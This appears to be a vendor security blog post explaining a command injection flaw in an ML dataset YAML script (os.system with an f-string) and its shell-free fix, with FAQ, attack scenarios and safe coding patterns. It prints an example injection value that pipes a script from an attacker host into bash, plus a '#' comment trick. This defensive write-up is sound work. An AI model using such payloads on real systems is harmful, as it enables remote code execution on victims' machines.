What is command injection in Python?

Command injection occurs when user-controlled data is embedded in a shell command string (e.g., via os.system() or subprocess with shell=True) without sanitization, allowing attackers to append shell metacharacters like `;`, `|`, or `&&` to execute arbitrary commands.

How do you prevent command injection in Python?

Avoid os.system() and shell=True entirely. Use Python's built-in filesystem functions like shutil.rmtree(), pathlib.Path.unlink(), or subprocess with a list of arguments (no shell=True) so the shell is never invoked.

What CWE is command injection?

Command injection is CWE-78: Improper Neutralization of Special Elements used in an OS Command ("OS Command Injection").

Is input validation enough to prevent command injection in Python?

Input validation (e.g., allowlisting characters) reduces risk but is fragile and error-prone. The safest approach is to eliminate the shell call entirely using native Python APIs like shutil, which makes injection structurally impossible regardless of input.
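As a rough illustration of why allowlisting is fragile, here is a minimal sketch. The pattern and the looks_safe helper are hypothetical and not part of the original script. The allowlist rejects the obvious metacharacter payload, yet accepts a string that rm would read as an option rather than a path.

```python
import re

# Hypothetical allowlist: letters, digits, dot, underscore, slash, hyphen.
ALLOWED_PATH = re.compile(r'[A-Za-z0-9._/-]+')


def looks_safe(path_text: str) -> bool:
    """Return True only if every character is on the allowlist."""
    return ALLOWED_PATH.fullmatch(path_text) is not None


print(looks_safe('/tmp/dataset/labels/train'))                         # True
print(looks_safe('/tmp/x; curl http://attacker.com/shell.sh | bash'))  # False
print(looks_safe('--no-preserve-root'))                                # True
```

The last case passes validation even though it is not a path at all, which is the kind of gap that makes validation a weaker defense than removing the shell call.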

Can static analysis detect command injection in Python?

Yes. Tools like Semgrep, Bandit, and multi-agent AI scanners can detect patterns like os.system() with f-strings or string concatenation. Orbis AppSec's scanner flagged this exact pattern in xView.yaml automatically.

How command injection happens in Python os.system() and how to fix it

Summary

A critical command injection vulnerability was found in the data/xView.yaml dataset download script used by a machine learning pipeline. The culprit: a single line — os.system(f'rm -rf {labels}') — that handed a user-influenced filesystem path directly to the shell. An attacker who controls the YAML configuration file could inject shell metacharacters into the labels path and achieve arbitrary command execution on the host machine. The fix is clean and decisive: throw out the shell call entirely and use Python's native filesystem APIs instead.

Introduction

The data/xView.yaml file defines how the xView aerial imagery dataset is downloaded and prepared for training. Buried inside its embedded Python download script, at line 102, was this line:

os.system(f'rm -rf {labels}')

The labels variable is a pathlib.Path object constructed from a base path that originates in the YAML configuration itself:

labels = Path(path / 'labels' / 'train')

Because path is derived from user-supplied or user-modifiable configuration, an attacker who can influence the YAML file can influence labels — and therefore influence the shell command that gets executed. This is the textbook definition of OS command injection (CWE-78), and it carries a critical severity rating because exploitation requires only the ability to supply a crafted dataset YAML file, which is a completely normal and expected operation when training on custom datasets.

The Vulnerability Explained

What went wrong

Python's os.system() passes its argument to the system shell (/bin/sh on Unix). When you use an f-string to build that argument, you're constructing a shell command string — and the shell will interpret every metacharacter in that string.

The vulnerable line:

os.system(f'rm -rf {labels}')

If labels evaluates to /path/to/project/labels/train, this becomes:

rm -rf /path/to/project/labels/train

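Perfectly harmless. But suppose an attacker controls the base path and sets it to something like:

/tmp/labels; curl http://attacker.com/shell.sh | bash

In simplified form, the resulting shell command becomes:

rm -rf /tmp/labels; curl http://attacker.com/shell.sh | bash

The shell executes both commands. The ; metacharacter acts as a command separator, and the attacker's payload runs with the same privileges as the Python process. In the real script, /labels/train is appended to the base path and pathlib collapses repeated slashes, so a working payload has to account for that, for example by ending with # so the shell treats the appended suffix as a comment.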
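The mechanism can be reproduced harmlessly. The sketch below assumes a POSIX shell and swaps rm -rf for echo so nothing is deleted. The build_command and run_in_shell helpers and the payload are illustrative, not taken from the original script.

```python
import subprocess
from pathlib import Path


def build_command(base: str) -> str:
    """Mimic the vulnerable pattern, with echo standing in for rm -rf."""
    labels = Path(base) / 'labels' / 'train'
    return f'echo would-remove {labels}'


def run_in_shell(command: str) -> list:
    """Run the string through the shell and return its output lines."""
    result = subprocess.run(command, shell=True, capture_output=True, text=True)
    return result.stdout.splitlines()


benign = build_command('/tmp/dataset')
# The trailing '#' turns the appended '/labels/train' into a shell comment.
crafted = build_command('/tmp/dataset; echo INJECTED #')

print(run_in_shell(benign))
print(run_in_shell(crafted))
```

With the crafted base path, the shell runs two commands instead of one: the intended echo, then the injected one.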

Realistic attack scenarios

Scenario 1 — Malicious dataset distribution:
An attacker publishes a modified xView.yaml (or a custom dataset YAML that follows the same pattern) on a public repository or model hub. A researcher downloads it and runs the training pipeline. The download script executes, and the injected command runs silently alongside the legitimate rm -rf.

Scenario 2 — Supply chain attack:
In a CI/CD pipeline that automatically fetches dataset configurations, a compromised upstream YAML file triggers command execution on the build server, potentially exfiltrating secrets or installing backdoors.

Scenario 3 — Local privilege escalation:
In a shared compute environment (e.g., a university GPU cluster), a user places a crafted YAML in a shared directory. Another user with higher privileges runs training, and the injected command executes under their account.

Why f-strings make this worse

An f-string gives the appearance of clean, readable code — there's no obvious string concatenation that might trigger a code reviewer's instinct. But f'rm -rf {labels}' is functionally identical to 'rm -rf ' + str(labels) from the shell's perspective. Both produce a single string that the shell will parse and execute in full, metacharacters and all.
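A short check makes the equivalence concrete. Nothing is executed here; the two strings are only built and compared, and the payload is a made-up example.

```python
from pathlib import Path

# Illustrative tainted path; the strings are built but never run.
labels = Path('/tmp/data; echo INJECTED #') / 'labels' / 'train'

via_fstring = f'rm -rf {labels}'
via_concat = 'rm -rf ' + str(labels)

# Both forms hand the shell exactly the same text.
print(via_fstring == via_concat)
```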

The Fix

The fix is elegant because it doesn't try to sanitize the input — it eliminates the shell entirely.

Before (vulnerable)

import os
from pathlib import Path

# ...

labels = Path(path / 'labels' / 'train')
os.system(f'rm -rf {labels}')
labels.mkdir(parents=True, exist_ok=True)

After (fixed)

import shutil
from pathlib import Path

# ...

labels = Path(path / 'labels' / 'train')
if labels.is_symlink() or labels.is_file():
    labels.unlink()
else:
    shutil.rmtree(labels, ignore_errors=True)
labels.mkdir(parents=True, exist_ok=True)

Why this fix works

1. No shell is ever invoked.
shutil.rmtree() and Path.unlink() run inside the Python process and call the operating system's filesystem functions directly. There is no shell process, no shell parsing, and therefore no opportunity for shell metacharacter injection. It doesn't matter what characters are in labels: they're treated as a literal filesystem path, not as a shell command string.

2. The import os is replaced with import shutil.
This is a meaningful signal: the fix doesn't just patch the dangerous call — it removes the dependency that enabled it. os.system() is no longer available in this script's namespace.

3. Symlink and file edge cases are handled explicitly.
The fix distinguishes between symlinks/files (labels.unlink()) and directories (shutil.rmtree()). The original rm -rf handled both implicitly. The explicit Python version spells out each case, which makes the behavior easier to read and review.

4. ignore_errors=True preserves the original intent.
The original rm -rf silently succeeds even if the path doesn't exist. shutil.rmtree(labels, ignore_errors=True) matches that behavior. Be aware that ignore_errors=True also suppresses every other failure, such as permission errors, so a deletion that fails will not raise an exception.
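To see the four points above in action, the following sketch wraps the fixed logic in a hypothetical reset_dir helper and runs it against a temporary directory whose name contains shell metacharacters. The directory name and helper are assumptions for illustration only.

```python
import shutil
import tempfile
from pathlib import Path


def reset_dir(target: Path) -> None:
    """Remove whatever exists at target, then recreate it as an empty directory."""
    if target.is_symlink() or target.is_file():
        target.unlink()
    else:
        shutil.rmtree(target, ignore_errors=True)
    target.mkdir(parents=True, exist_ok=True)


with tempfile.TemporaryDirectory() as tmp:
    root = Path(tmp)
    # A path that would be dangerous in a shell string is just a name here.
    hostile = root / 'data; touch pwned' / 'labels' / 'train'
    hostile.mkdir(parents=True)
    (hostile / 'old.txt').write_text('stale label')

    reset_dir(hostile)

    leftover = sorted(p.name for p in hostile.iterdir())
    still_dir = hostile.is_dir()
    injected = (root / 'pwned').exists()

print(leftover, still_dir, injected)
```

The directory is emptied and recreated, and no pwned file appears, because the semicolon is never interpreted by anything.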

Prevention & Best Practices

Never use `os.system()` with dynamic input

os.system() should be treated as a code smell in modern Python. It offers no argument separation, no output capture, and no protection against injection. The Python docs themselves recommend subprocess as a replacement — but even subprocess is dangerous with shell=True.

Pattern	Safe?	Notes
`os.system(f'rm -rf {path}')`	❌	Shell injection, no output capture
`subprocess.run(f'rm -rf {path}', shell=True)`	❌	Same shell injection risk
`subprocess.run(['rm', '-rf', str(path)])`	✅	No shell, args passed directly
`shutil.rmtree(path)`	✅	Best: no subprocess at all
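The list-argument row in the table can be checked with a small, portable sketch. It assumes only that a Python interpreter is available as the child process; the child simply prints the first argument it receives.

```python
import subprocess
import sys

hostile = '/tmp/data; echo INJECTED'

# No shell=True: each list element reaches the child as one literal argument.
child = [sys.executable, '-c', 'import sys; print(sys.argv[1])', hostile]
result = subprocess.run(child, capture_output=True, text=True, check=True)
received = result.stdout.strip()

print(received == hostile)
```

The child sees the semicolon as ordinary text, since no shell ever parses the argument.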

Prefer native Python filesystem APIs

For filesystem operations, Python's standard library almost always has a safe equivalent:

import shutil
from pathlib import Path

# Instead of: os.system('rm -rf /some/path')
shutil.rmtree('/some/path', ignore_errors=True)

# Instead of: os.system('cp src dst')
shutil.copy2(src, dst)  # also preserves file metadata, like cp -p

# Instead of: os.system('mkdir -p /some/path')
Path('/some/path').mkdir(parents=True, exist_ok=True)

# Instead of: os.system('mv src dst')
shutil.move(src, dst)  # unlike Path.rename(), also works across filesystems

Use `shlex.quote()` as a last resort

If you absolutely must pass a path to a shell command, use shlex.quote() to escape it:

import shlex
import subprocess

# If you truly cannot avoid a shell call:
safe_path = shlex.quote(str(labels))
subprocess.run(f'some-tool --input {safe_path}', shell=True, check=True)

shlex.quote() wraps the string in single quotes and escapes any internal single quotes, preventing shell interpretation. It is designed for POSIX shells only, so it is not a safeguard on Windows. Treat it as a last resort: the preferred solution is always to avoid the shell entirely.
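A quick sketch of what the quoting does in practice, assuming a POSIX shell and using echo as a harmless stand-in for the real tool:

```python
import shlex
import subprocess

hostile = '/tmp/data; echo INJECTED'
quoted = shlex.quote(hostile)
print(quoted)  # the whole value is wrapped in single quotes

# The shell now sees one quoted word, so the semicolon is not a separator.
result = subprocess.run(f'echo {quoted}', shell=True, capture_output=True, text=True)
echoed = result.stdout.strip()
print(echoed == hostile)
```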

Audit YAML-embedded scripts

Dataset configuration files that embed executable Python scripts (a pattern used by several ML frameworks) deserve special security scrutiny. Any path, URL, or string value that flows from YAML configuration into a shell command is a potential injection point. When reviewing such files, trace every variable that touches os.system(), subprocess, or eval().
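A first pass of such an audit can be automated. The sketch below is a deliberately crude, name-based scan using Python's ast module. It assumes the embedded script has already been extracted from the YAML into a string; find_risky_calls and RISKY_NAMES are hypothetical names. It does not trace data flow, so every hit still needs manual review.

```python
import ast

# Call names worth a manual look; matching is by name only, so expect noise.
RISKY_NAMES = {'system', 'popen', 'eval', 'exec'}


def find_risky_calls(source: str) -> list:
    """Return sorted (line, name) pairs for shell-style calls in the source."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        name = func.attr if isinstance(func, ast.Attribute) else getattr(func, 'id', None)
        uses_shell = any(
            kw.arg == 'shell' and isinstance(kw.value, ast.Constant) and kw.value.value is True
            for kw in node.keywords
        )
        if name in RISKY_NAMES or uses_shell:
            findings.append((node.lineno, name))
    return sorted(findings)


sample = (
    "import os, subprocess\n"
    "os.system(f'rm -rf {labels}')\n"
    "subprocess.run(cmd, shell=True)\n"
    "shutil.rmtree(labels)\n"
)
print(find_risky_calls(sample))
```

Dedicated tools such as Bandit or Semgrep cover far more cases; this only shows the shape of the check.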

Relevant standards

CWE-78: Improper Neutralization of Special Elements used in an OS Command
OWASP A03:2021: Injection — command injection is explicitly covered
OWASP Command Injection Defense Cheat Sheet: recommends avoiding shell calls and using language-native APIs

Key Takeaways

os.system() with an f-string is always dangerous when the interpolated value is user-influenced — in this case, the labels path in xView.yaml was directly derived from YAML configuration that any user can modify.
The labels variable carried the taint to the sink: it was built from the YAML path configuration (the actual source) and reached os.system() without any sanitization or quoting.
Replacing os.system() with shutil.rmtree() is not just a patch — it's a structural fix that makes injection impossible by design, regardless of what the path contains.
YAML files that embed executable scripts are an underappreciated attack surface in ML pipelines; every dynamic value that reaches a shell call must be treated as potentially attacker-controlled.
Paired with Path.unlink() for files and symlinks, shutil.rmtree() with ignore_errors=True is a close behavioral replacement for rm -rf that requires zero shell involvement.

How Orbis AppSec Detected This

Source: The path variable derived from YAML dataset configuration in data/xView.yaml, which flows into labels = Path(path / 'labels' / 'train')
Sink: os.system(f'rm -rf {labels}') at data/xView.yaml:102 — a shell-invoking function receiving an f-string built from the tainted labels variable
Missing control: No shell escaping (e.g., shlex.quote()), no input validation, and no use of shell-free filesystem APIs before the value reached os.system()
CWE: CWE-78 — Improper Neutralization of Special Elements used in an OS Command ("OS Command Injection")
Fix: Replaced os.system(f'rm -rf {labels}') with shutil.rmtree(labels, ignore_errors=True) and labels.unlink(), removing the shell invocation entirely

Orbis AppSec automatically detected this vulnerability and opened a pull request with the fix. Try Orbis AppSec on your repositories to find and fix issues like this automatically.

Conclusion

A single line — os.system(f'rm -rf {labels}') — was enough to introduce a critical command injection vulnerability into an ML dataset pipeline. The root cause isn't exotic: it's the combination of a shell-invoking function and an f-string built from user-influenced data, a pattern that appears frequently in data science and ML codebases where shell commands are used as quick shortcuts for filesystem operations.

The fix demonstrates the right mental model: when you need to delete a directory in Python, reach for shutil.rmtree(), not os.system('rm -rf ...'). The Python standard library has safe, shell-free equivalents for virtually every common filesystem operation. Using them doesn't just fix a vulnerability — it makes the entire class of shell injection attacks structurally impossible in that code path.

If you maintain ML pipelines that use YAML-embedded download scripts, this is a good moment to audit every call to os.system(), subprocess.run(..., shell=True), and eval() and ask: does any user-controlled value reach this call? If the answer is yes, the shell needs to go.

Vulnerability at a Glance

Field	Value
CWE	CWE-78
Fix	Replaced os.system() shell invocation with shutil.rmtree() and Path.unlink(), eliminating shell interpretation entirely
Risk	Arbitrary command execution on the host machine when processing attacker-controlled YAML dataset configuration
Language	Python
Root cause	User-influenced path variable interpolated directly into an os.system() shell command via an f-string without sanitization
Vulnerability	OS Command Injection via f-string in os.system()
